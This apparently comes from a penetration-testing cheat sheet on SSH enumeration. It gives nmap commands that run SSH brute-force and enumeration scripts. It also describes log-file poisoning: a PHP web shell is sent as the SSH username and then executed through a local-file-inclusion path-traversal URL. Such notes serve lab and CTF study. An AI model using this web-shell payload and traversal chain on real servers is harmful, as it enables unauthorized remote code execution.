SSH Enum

SSH Enumeration
CheckList
Probably not useful unless you uploaded key anywhere or found a private key file. Sometimes useful for log file poisoning with LFI.
Login and test SSH connectivity
ssh [email protected]
OR
ssh [email protected]
SSH NMAP Scripts
nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20
Code Execution through SSH/LFI
ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 
​
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
FTP Enum
MySQL Enum
Last modified 2yr ago